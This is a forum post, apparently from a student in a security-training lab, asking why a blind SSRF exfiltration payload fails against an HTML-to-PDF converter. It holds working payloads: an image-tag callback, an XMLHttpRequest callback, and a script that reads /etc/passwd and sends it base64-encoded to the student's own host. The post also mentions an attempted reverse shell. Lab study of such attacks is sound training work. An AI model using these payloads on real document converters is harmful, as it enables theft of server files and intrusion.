I’m completely stuck in the middle of the Blind SSRF Exploitation Example section of Server-Side Attacks. I’m at the part where I’m uploading HTML content to the PDF converter. The following payloads do work:
<!DOCTYPE html>
<html>
<body>
<a>Hello World!</a>
<img src="http://10.10.15.170:9090/x?=viaimgtag">
</body>
</html>
This hits my server with:
10.129.227.153 - - [04/Feb/2023 14:06:59] "GET /x?=viaimgtag HTTP/1.1" 404 -
So far so good. Now I add some javascript:
<script>
var exfil = new XMLHttpRequest(); // Send the file to our server
var url = 'http://10.10.15.170:9090/?data=test123';
exfil.open("GET", url, true);
exfil.send();
</script>
This hits my server with:
10.129.227.153 - - [04/Feb/2023 14:35:12] "GET /?data=test123 HTTP/1.1" 200 -
as expected.
But when I try and upload the following example code, which is taken directly from the module section, and only modified with my IP address and port (the same IP address and port I’m using in the above examples), I never get a request to my server, and I never get a response from the server for my POST request.
<html>
<body>
<b>Exfiltration via Blind SSRF</b>
<script>
var readfile = new XMLHttpRequest(); // Read the local file
var exfil = new XMLHttpRequest(); // Send the file to our server
readfile.open("GET","file:///etc/passwd", true);
readfile.send();
readfile.onload = function() {
if (readfile.readyState === 4) {
var url = 'http://10.10.15.170:9090/?data='+btoa(this.response);
exfil.open("GET", url, true);
exfil.send();
}
}
readfile.onerror = function(){document.write('<a>Oops!</a>');}
</script>
</body>
</html>
I get the same problem when I try and upload my reverse shell code, but I figure I should get this working before I move on to that.
I’ve tried to modify the readfile URL to read localhost:8080, localhost, or something other things, to see if the read is the problem, but I get the same thing every time (no server response, no callback to my server).
I’m running out of ideas. Can anyone think of anything?